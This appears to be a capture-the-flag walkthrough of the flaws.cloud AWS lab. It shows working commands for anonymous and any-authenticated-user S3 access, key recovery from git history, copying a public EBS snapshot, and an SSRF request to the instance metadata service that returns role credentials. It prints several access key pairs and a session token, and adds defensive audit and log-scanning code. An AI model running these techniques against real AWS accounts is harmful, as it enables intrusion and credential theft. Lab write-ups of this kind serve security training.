flaws.cloud
Level 1
DNS enum:
$ dig +nocmd flaws.cloud
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 46135
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;flaws.cloud. IN A
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.176.234
;; Query time: 64 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Sat Aug 28 16:30:43 +0630 2021
;; MSG SIZE rcvd: 56
$ nslookup 52.218.176.234
234.176.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
Authoritative answers can be found from:
List the s3 bucket the site is served from (no credentials needed, it allows anonymous listing):
aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
2017-03-14 09:30:38 2575 hint1.html
2017-03-03 10:35:17 1707 hint2.html
2017-03-03 10:35:11 1101 hint3.html
2020-05-23 00:46:45 3162 index.html
2018-07-10 23:17:16 15979 logo.png
2017-02-27 08:29:28 46 robots.txt
2017-02-27 08:29:30 1051 secret-dd02c7c.html
Level 2:
http://flaws.cloud/secret-dd02c7c.html
# http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/
Level 2
Link - http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/
Create a simple IAM user in your own AWS account and you will get an access key id and secret access key.
https://console.aws.amazon.com/iam/home#/users$new?step=final&accessKey&userNames=test123
This is my access key id and secret key. I copy them.
AKIAUFZUUPCWBRVSKK5L
hePWL07ve1b12e6LNS1iva4nMWJbVzp/qWnrROyo
When I access the s3 bucket anonymously, I get a permission error.
% aws s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied
Create a profile with the id and key.
% aws configure --profile liv-test
AWS Access Key ID [None]: AKIAUFZUUPCWBRVSKK5L
AWS Secret Access Key [None]: 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
Default region name [None]:
Default output format [None]:
% aws configure list --profile liv-test
Name Value Type Location
---- ----- ---- --------
profile liv-test manual --profile
access_key ****************KK5L shared-credentials-file
secret_key ****************ROyo shared-credentials-file
region <not set> None None
Don't forget to create a group and add the user to this group. Now you can list the bucket with this profile, because the bucket grants access to any authenticated AWS user, not just the owner's account.
% aws s3 --profile liv-test ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
2017-02-27 08:32:15 80751 everyone.png
2017-03-03 10:17:17 1433 hint1.html
2017-02-27 08:34:39 1035 hint2.html
2017-02-27 08:32:14 2786 index.html
2017-02-27 08:32:14 26 robots.txt
2017-02-27 08:32:15 1051 secret-e4443fc.html
You will get the level 3 link.
http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html
# http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/
Level 3
Link - http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/
First, list the s3 bucket.
% aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ --no-sign-request
PRE .git/
2017-02-27 06:44:33 123637 authenticated_users.png
2017-02-27 06:44:34 1552 hint1.html
2017-02-27 06:44:34 1426 hint2.html
2017-02-27 06:44:35 1247 hint3.html
2017-02-27 06:44:33 1035 hint4.html
2020-05-23 00:51:10 1861 index.html
2017-02-27 06:44:33 26 robots.txt
Download all of these files.
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request
You will see a .git directory with its commit history.
% git log
commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526 (HEAD -> master)
Author: 0xdabbad00 <scott@summitroute.com>
Date: Sun Sep 17 09:10:43 2017 -0600
Oops, accidentally added something I shouldn't have
commit f52ec03b227ea6094b04e43f475fb0126edb5a61
Author: 0xdabbad00 <scott@summitroute.com>
Date: Sun Sep 17 09:10:07 2017 -0600
first commit
Show the first commit in the log. The diff reveals an access key id and secret key.
% git show b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526 (HEAD -> master)
Author: 0xdabbad00 <scott@summitroute.com>
Date: Sun Sep 17 09:10:43 2017 -0600
Oops, accidentally added something I shouldn't have
diff --git a/access_keys.txt b/access_keys.txt
deleted file mode 100644
index e3ae6dd..0000000
--- a/access_keys.txt
+++ /dev/null
@@ -1,2 +0,0 @@
-access_key AKIAJ366LIPB4IJKT7SA
-secret_access_key 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
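Review bot: deleting access_keys.txt in this commit does not remove the credentials from the repository; the previous commit f52ec03b227ea6094b04e43f475fb0126edb5a61 still contains the file, so anyone who can read the .git directory recovers the pair with git show. The key AKIAJ366LIPB4IJKT7SA must be treated as compromised and rotated, and the history rewritten before the repository is published anywhere, including an S3 bucket.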
Create a profile with this key.
% aws configure --profile level3
AWS Access Key ID [None]: AKIAJ366LIPB4IJKT7SA
AWS Secret Access Key [None]: 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
Default region name [None]:
Default output format [None]:
% aws s3 --profile level3 ls
2017-02-13 04:01:07 2f4e53154c0a7fd086a04a12a452c2a4caed8da0.flaws.cloud
2017-05-29 23:04:53 config-bucket-975426262029
2017-02-13 02:33:24 flaws-logs
2017-02-05 10:10:07 flaws.cloud
2017-02-24 08:24:13 level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
2017-02-27 00:45:44 level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
2017-02-27 00:46:06 level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
2017-02-27 02:14:51 level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud
2017-02-27 02:17:58 level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
2017-02-27 02:36:32 theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud
Level 4
Link - http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
Get the caller identity using the level3 key.
% aws --profile level3 sts get-caller-identity
{
"UserId": "AIDAJQ3H5DC3LEG2BKSLC",
"Account": "975426262029",
"Arn": "arn:aws:iam::975426262029:user/backup"
}
List all snapshots owned by this account.
% aws --profile level3 ec2 describe-snapshots --owner-id 975426262029
You must specify a region. You can also configure your region by running "aws configure".
No problem. We know the region from level 1.
% aws --profile level3 ec2 describe-snapshots --owner-id 975426262029 --region us-west-2
{
"Snapshots": [
{
"Description": "",
"Encrypted": false,
"OwnerId": "975426262029",
"Progress": "100%",
"SnapshotId": "snap-0b49342abd1bdcb89",
"StartTime": "2017-02-28T01:35:12.000Z",
"State": "completed",
"VolumeId": "vol-04f1c039bc13ea950",
"VolumeSize": 8,
"Tags": [
{
"Key": "Name",
"Value": "flaws backup 2017.02.27"
}
]
}
]
}
Check the snapshot's createVolumePermission attribute.
% aws ec2 describe-snapshot-attribute --snapshot-id snap-0b49342abd1bdcb89 --attribute createVolumePermission --profile level3 --region us-west-2
{
"CreateVolumePermissions": [
{
"Group": "all"
}
],
"SnapshotId": "snap-0b49342abd1bdcb89"
}
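The permission check above is the one a defender should run over every snapshot in an account. The following is an added example, not code from the walkthrough: it audits the describe-snapshots and describe-snapshot-attribute output (embedded here as constructed sample data copied from the level 4 output) and flags snapshots that are public or shared with another account. With boto3 the same two JSON documents come from describe_snapshots(OwnerIds=["self"]) and describe_snapshot_attribute(Attribute="createVolumePermission").

```python
import json

# Constructed sample: describe-snapshots and describe-snapshot-attribute output
# copied from the walkthrough above, embedded so the audit runs offline.
SNAPSHOTS = json.loads("""{"Snapshots": [{"SnapshotId": "snap-0b49342abd1bdcb89",
 "OwnerId": "975426262029", "Encrypted": false, "VolumeSize": 8, "State": "completed",
 "Tags": [{"Key": "Name", "Value": "flaws backup 2017.02.27"}]}]}""")
ATTRIBUTES = {"snap-0b49342abd1bdcb89": json.loads(
    """{"CreateVolumePermissions": [{"Group": "all"}],
        "SnapshotId": "snap-0b49342abd1bdcb89"}""")}


def name_tag(snapshot):
    """Return the Name tag (or the snapshot id) so findings are readable."""
    for tag in snapshot.get("Tags", []):
        if tag.get("Key") == "Name":
            return tag.get("Value")
    return snapshot["SnapshotId"]


def audit_snapshots(snapshots, attributes_by_id, own_account):
    """Flag snapshots whose createVolumePermission lets other accounts copy them.
    Group "all" means any AWS account can create a volume from the snapshot
    (exactly what level 4 exploits); a foreign UserId means cross-account sharing.
    Returns a list of (snapshot_id, severity, detail, name) tuples."""
    findings = []
    for snap in snapshots["Snapshots"]:
        sid = snap["SnapshotId"]
        attr = attributes_by_id.get(sid, {})
        for perm in attr.get("CreateVolumePermissions", []):
            if perm.get("Group") == "all":
                findings.append((sid, "PUBLIC", "Group=all", name_tag(snap)))
            elif "UserId" in perm and perm["UserId"] != own_account:
                findings.append((sid, "SHARED", "UserId=" + perm["UserId"], name_tag(snap)))
    return findings


if __name__ == "__main__":
    for finding in audit_snapshots(SNAPSHOTS, ATTRIBUTES, "975426262029"):
        print(finding)
```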
Group "all" means the snapshot is public. Create a volume from it in your own account.
% aws ec2 --profile liv-test create-volume --region us-west-2 --availability-zone us-west-2a --snapshot-id snap-0b49342abd1bdcb89
{
"AvailabilityZone": "us-west-2a",
"CreateTime": "2021-08-28T21:45:27.000Z",
"Encrypted": false,
"Size": 8,
"SnapshotId": "snap-0b49342abd1bdcb89",
"State": "creating",
"VolumeId": "vol-0e621fe2ba72e7433",
"Iops": 100,
"Tags": [],
"VolumeType": "gp2",
"MultiAttachEnabled": false
}
View the public IP of the flaws instance (just for reference; the snapshot is what we mount).
% aws ec2 describe-instances --query "Reservations[*].Instances[*].PublicIpAddress" --output=text --profile level3 --region us-west-2
35.165.182.7
Create an EC2 instance in your own account. In the volume tab, search snapshots for 0b49342abd1bdcb89 and attach it as /dev/sdf. Log in to the instance using your SSH key.
% mv ~/Downloads/hnl.pem .
% chmod 600 hnl.pem
% ssh -i hnl.pem ubuntu@34.211.97.131
The authenticity of host '34.211.97.131 (34.211.97.131)' can't be established.
ECDSA key fingerprint is SHA256:pETgClWtWrlnIsvDIJxzbDKkGXClHY7FCjaXjJN084A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '34.211.97.131' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-1045-aws x86_64)
List all block devices. The snapshot volume is attached as xvdf.
ubuntu@ip-172-31-60-33:~$ lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
loop0 7:0 0 33.3M 1 loop /snap/amazon-ssm-agent/3552
loop1 7:1 0 55.5M 1 loop /snap/core18/1997
loop2 7:2 0 70.4M 1 loop /snap/lxd/19647
loop3 7:3 0 32.3M 1 loop /snap/snapd/11588
xvda 202:0 0 8G 0 disk
└─xvda1 202:1 0 8G 0 part /
xvdf 202:80 0 8G 0 disk
└─xvdf1 202:81 0 8G 0 part
ubuntu@ip-172-31-60-33:~$ sudo -i
root@ip-172-31-60-33:~# sudo mkdir /mnt/flaws
root@ip-172-31-60-33:~# sudo mount /dev/xvdf1 /mnt/flaws
root@ip-172-31-60-33:~# cd /mnt/flaws
root@ip-172-31-60-33:/mnt/flaws# ls
bin dev home initrd.img.old lib64 media opt root sbin srv tmp var vmlinuz.old
boot etc initrd.img lib lost+found mnt proc run snap sys usr vmlinuz
root@ip-172-31-60-33:/mnt/flaws# cat etc/nginx/.htpasswd
flaws:$apr1$4ed/7TEL$cJnixIRA6P4H8JDvKVMku0
root@ip-172-31-60-33:/mnt/flaws# cd home/ubuntu/
root@ip-172-31-60-33:/mnt/flaws/home/ubuntu# ls
meta-data setupNginx.sh
root@ip-172-31-60-33:/mnt/flaws/home/ubuntu# cat setupNginx.sh
htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
The setup script contains the plaintext password for the htpasswd user, which opens the level 5 link.
http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/
Level 5
Link - http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/
Level 5 runs an HTTP proxy on an EC2 instance. Use it to request the instance metadata service (169.254.169.254), which hands out the instance role's temporary credentials:
% curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
{
"Code" : "Success",
"LastUpdated" : "2021-08-29T02:41:10Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIA6GG7PSQGT456HE65",
"SecretAccessKey" : "SYGydiwEug0lTorDP5PHq9ZsUcxcsB3uARhJHs7B",
"Token" : "<session token omitted>",
"Expiration" : "2021-08-29T08:51:15Z"
}
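A request like the one above leaves a clear trace in the proxy's access log. The following is an added example, not part of the walkthrough: it scans nginx-style access log lines (constructed samples, not real traffic) for /proxy/ requests whose target falls in the link-local metadata range, so the hit is flagged even when the path or status differs from the textbook one. The real fix is to require IMDSv2 (HttpTokens=required), which this GET-only proxy cannot satisfy.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample nginx-style access log (not from the original page). The first
# line reproduces the shape of the walkthrough's request; the rest is mixed traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Aug/2021:02:41:10 +0000] "GET /proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/ HTTP/1.1" 200 1402
203.0.113.5 - - [29/Aug/2021:02:41:12 +0000] "GET /proxy/flaws.cloud/ HTTP/1.1" 200 3162
198.51.100.7 - - [29/Aug/2021:02:42:00 +0000] "GET /proxy/169.254.169.254/latest/meta-data/ HTTP/1.1" 200 162
198.51.100.9 - - [29/Aug/2021:02:43:00 +0000] "GET /index.html HTTP/1.1" 200 871
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
PROXY_RE = re.compile(r'^/proxy/([^/]+)(/.*)?$')
# Link-local range used by the EC2 metadata service, plus its IPv6 endpoint.
METADATA_NETS = (ip_network("169.254.0.0/16"), ip_network("fd00:ec2::254/128"))


def is_metadata_host(host):
    """True if the proxied host is an IP inside the instance-metadata range.
    Hostnames (e.g. flaws.cloud) are not resolved here and return False."""
    try:
        addr = ip_address(host.strip("[]"))
    except ValueError:
        return False
    return any(addr in net for net in METADATA_NETS)


def find_imds_requests(log_text):
    """Return (client_ip, path, status) for every /proxy/ request aimed at the
    metadata service, regardless of whether the upstream answered 200."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _ts, _method, path, status = m.groups()
        pm = PROXY_RE.match(path)
        if pm and is_metadata_host(pm.group(1)):
            hits.append((client, path, int(status)))
    return hits


if __name__ == "__main__":
    for hit in find_imds_requests(SAMPLE_LOG):
        print(hit)
```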
Set up the credentials in ~/.aws/credentials. These are temporary credentials, so the session token is required as well.
% cat ~/.aws/credentials
[level5]
aws_access_key_id = ASIA6GG7PSQGT456HE65
aws_secret_access_key = SYGydiwEug0lTorDP5PHq9ZsUcxcsB3uARhJHs7B
aws_session_token = IQoJb3JpZ2luX2VjEGMaCXVzLXdlc3QtMiJHMEUCIQDK+WToeB+NGzdOY17DSv8O4F8n3eOHxJW/plep2Z0FCgIgCvPCnthTloGfwWgJctQSvAwv6DiMPnRb11Rb8vsRgggqgwQInP//////////ARACGgw5NzU0MjYyNjIwMjkiDJ1HIH85ZrK+CC1ccCrXA/Ilw0avQMFN7XvGtN7Nfaiktvvh/QD0T4Qd1g+VUVtv7ewN9ibPaOKehprcDPIDkrbtKWWT9kgtVZnD7OppLpN4/2vMm5gm8GsmHTCqsPw4xUgNX89oZsZ1sLDC74Kn/Cvo152w9YJybJr/A7xwgIGqyLk7J9ookpS4vqNeFDoDo/IFHarZrbwSRBDbOM9848EMDnAshXYM5IwKOfM8fB1brzQimuwHl0qepujIxBt3nVZiEsg4Aq+beFp3DzYU4AaMScLQVNjJIaG7pscQg7ZvTgvXodSRGBv4+W98bV7/Ais7kWSrXsQC0VIzop31HDU0/icy/QD5pe13vkB8CQK2YqKOiUDW/jOhS0pGbHFI3fN0YQIZXgfGaHLHO4Wz4l6YQiI6oa24xI4ZTwpvFcDjrydPqhrla0l/laeexHKoVDkecFUlwq6pQb/IaH1Kn1cI3hgW0PwY+vn28xq6gCXcX0uGvzX9H8EL8NrzUbecy9SNRLIIsTjshU03Y0eDtjVeCL1hvBhZnfysfrTaGNSwYb+jYyGA43LjZDz9AxMVwQHk78PDILkgu3j27p2YZdDSRwrLN52vuw8RcVZLtLPC8wMvLZVNfszN87VeaFbL5WYwEmiZfDDe56uJBjqlAUerBhoKg4ebyAG4fRrG6mGxMVGVHLyV8bcFW93oikrwjyLKYgqfx/raV30+GhLv5U+EmxP4NlaKYlIVf/NH2l1dpb/2cDpZHkq5Zfg/VeOgRr/GBbSiYm69nzODo3H9xr8IPNhJPmKk+KHmgHlPMjulx2yatGIiBEQCnQ/1q1osHm3Xp9WrhD3vwqS+wiOwpczE2jdS9mqxPFGUyKI1h5l22iZAMg==
% aws configure list --profile level5
Name Value Type Location
---- ----- ---- --------
profile level5 manual --profile
access_key ****************HE65 shared-credentials-file
secret_key ****************Hs7B shared-credentials-file
region <not set> None None
List the level 6 bucket with the instance role's credentials:
% aws --profile level5 s3 ls level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
PRE ddcc78ff/
2017-02-27 08:41:07 871 index.html
% aws --profile level5 s3 ls level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/
2017-03-03 11:06:23 2463 hint1.html
2017-03-03 11:06:23 2080 hint2.html
2020-05-23 01:12:20 2924 index.html
Level 6
Access key ID: AKIAJFQ6E7BY57Q3OBGA Secret: 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
Configure the credentials in ~/.aws/credentials
% cat ~/.aws/credentials
[level6]
aws_access_key_id = AKIAJFQ6E7BY57Q3OBGA
aws_secret_access_key = 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
Get the IAM user info:
% aws --profile level6 iam get-user
{
"User": {
"Path": "/",
"UserName": "Level6",
"UserId": "AIDAIRMDOSCWGLCDWOG6A",
"Arn": "arn:aws:iam::975426262029:user/Level6",
"CreateDate": "2017-02-26T23:11:16Z"
}
}
List the policies attached to the user (MySecurityAudit is the default one):
% aws --profile level6 iam list-attached-user-policies --user-name Level6
{
"AttachedPolicies": [
{
"PolicyName": "list_apigateways",
"PolicyArn": "arn:aws:iam::975426262029:policy/list_apigateways"
},
{
"PolicyName": "MySecurityAudit",
"PolicyArn": "arn:aws:iam::975426262029:policy/MySecurityAudit"
},
{
"PolicyName": "AWSCompromisedKeyQuarantine",
"PolicyArn": "arn:aws:iam::aws:policy/AWSCompromisedKeyQuarantine"
}
]
}
Get the list_apigateways policy by its ARN (Amazon Resource Name):
% aws --profile level6 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
{
"Policy": {
"PolicyName": "list_apigateways",
"PolicyId": "ANPAIRLWTQMGKCSPGTAIO",
"Arn": "arn:aws:iam::975426262029:policy/list_apigateways",
"Path": "/",
"DefaultVersionId": "v4",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"Description": "List apigateways",
"CreateDate": "2017-02-20T01:45:17Z",
"UpdateDate": "2017-02-20T01:48:17Z"
}
}
Get the default policy version's document, which shows what the policy actually allows:
% aws --profile level6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"apigateway:GET"
],
"Effect": "Allow",
"Resource": "arn:aws:apigateway:us-west-2::/restapis/*"
}
]
},
"VersionId": "v4",
"IsDefaultVersion": true,
"CreateDate": "2017-02-20T01:48:17Z"
}
}
List all lambda functions (the MySecurityAudit policy allows this):
% aws --region us-west-2 --profile level6 lambda list-functions
{
"Functions": [
{
"FunctionName": "Level6",
"FunctionArn": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
"Runtime": "python2.7",
"Role": "arn:aws:iam::975426262029:role/service-role/Level6",
"Handler": "lambda_function.lambda_handler",
"CodeSize": 282,
"Description": "A starter AWS Lambda function.",
"Timeout": 3,
"MemorySize": 128,
"LastModified": "2017-02-27T00:24:36.054+0000",
"CodeSha256": "2iEjBytFbH91PXEMO5R/B9DqOgZ7OG/lqoBNZh5JyFw=",
"Version": "$LATEST",
"TracingConfig": {
"Mode": "PassThrough"
},
"RevisionId": "98033dfd-defa-41a8-b820-1f20add9c77b",
"PackageType": "Zip"
}
]
}
Get the resource policy of the Level6 function. The SourceArn condition tells us which API Gateway is allowed to invoke it:
% aws --profile level6 --region us-west-2 lambda get-policy --function-name Level6
{
"Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"904610a93f593b76ad66ed6ed82c0a8b\",\"Effect\":\"Allow\",\"Principal\":{\"Service\":\"apigateway.amazonaws.com\"},\"Action\":\"lambda:InvokeFunction\",\"Resource\":\"arn:aws:lambda:us-west-2:975426262029:function:Level6\",\"Condition\":{\"ArnLike\":{\"AWS:SourceArn\":\"arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\"}}}]}",
"RevisionId": "98033dfd-defa-41a8-b820-1f20add9c77b"
}
s33ppypa75, taken from the SourceArn condition, is the REST API id. List its deployed stages:
% aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
{
"item": [
{
"deploymentId": "8gppiv",
"stageName": "Prod",
"cacheClusterEnabled": false,
"cacheClusterStatus": "NOT_AVAILABLE",
"methodSettings": {},
"tracingEnabled": false,
"createdDate": 1488155168,
"lastUpdatedDate": 1488155168
}
]
}
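The last two steps can be automated: read the function's resource policy, pull the execute-api ARN out of the SourceArn condition, and expand its stage wildcard against the stages get-stages returns. The following is an added example, not code from the walkthrough, working on constructed input copied from the get-policy and get-stages output above; it also reports statements that have no SourceArn at all, since those let any API in the account invoke the function.

```python
import json

# Constructed sample: the get-policy and get-stages output from the walkthrough,
# embedded so the resolver runs offline. "Policy" is itself a JSON-encoded string.
GET_POLICY_OUTPUT = {"Policy": json.dumps({
    "Version": "2012-10-17", "Id": "default",
    "Statement": [{"Sid": "904610a93f593b76ad66ed6ed82c0a8b", "Effect": "Allow",
                   "Principal": {"Service": "apigateway.amazonaws.com"},
                   "Action": "lambda:InvokeFunction",
                   "Resource": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
                   "Condition": {"ArnLike": {"AWS:SourceArn":
                       "arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6"}}}]}),
    "RevisionId": "98033dfd-defa-41a8-b820-1f20add9c77b"}
GET_STAGES_OUTPUT = {"item": [{"deploymentId": "8gppiv", "stageName": "Prod"}]}


def api_gateway_triggers(get_policy_output):
    """Return (region, api_id, stage, method, path) for each statement that lets API
    Gateway invoke the function; an execute-api ARN is laid out as
    arn:aws:execute-api:REGION:ACCOUNT:API_ID/STAGE/METHOD/PATH, any part may be *.
    A statement without a SourceArn condition is returned as None."""
    doc = json.loads(get_policy_output["Policy"])  # nested JSON string
    triggers = []
    for st in doc.get("Statement", []):
        principal = st.get("Principal") or {}
        if st.get("Effect") != "Allow" or not isinstance(principal, dict) \
                or principal.get("Service") != "apigateway.amazonaws.com":
            continue
        cond = st.get("Condition") or {}
        src = (cond.get("ArnLike") or cond.get("ArnEquals") or {}).get("AWS:SourceArn")
        if not src:
            triggers.append(None)
            continue
        parts = src.split(":", 5)
        api_id, stage, method, path = parts[5].split("/", 3)
        triggers.append((parts[3], api_id, stage, method, path))
    return triggers


def invoke_urls(get_policy_output, get_stages_output):
    """Expand a '*' stage against the deployed stages and build the public invoke URLs."""
    stages = [s["stageName"] for s in get_stages_output.get("item", [])]
    urls = []
    for trig in api_gateway_triggers(get_policy_output):
        if trig is None:
            continue
        region, api_id, stage, _method, path = trig
        for s in (stages if stage == "*" else [stage]):
            urls.append(f"https://{api_id}.execute-api.{region}.amazonaws.com/{s}/{path}")
    return urls


if __name__ == "__main__":
    print(invoke_urls(GET_POLICY_OUTPUT, GET_STAGES_OUTPUT))
```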
Final link (API id, region, stage name and the GET path from the SourceArn):
https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6
# "Go to http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/"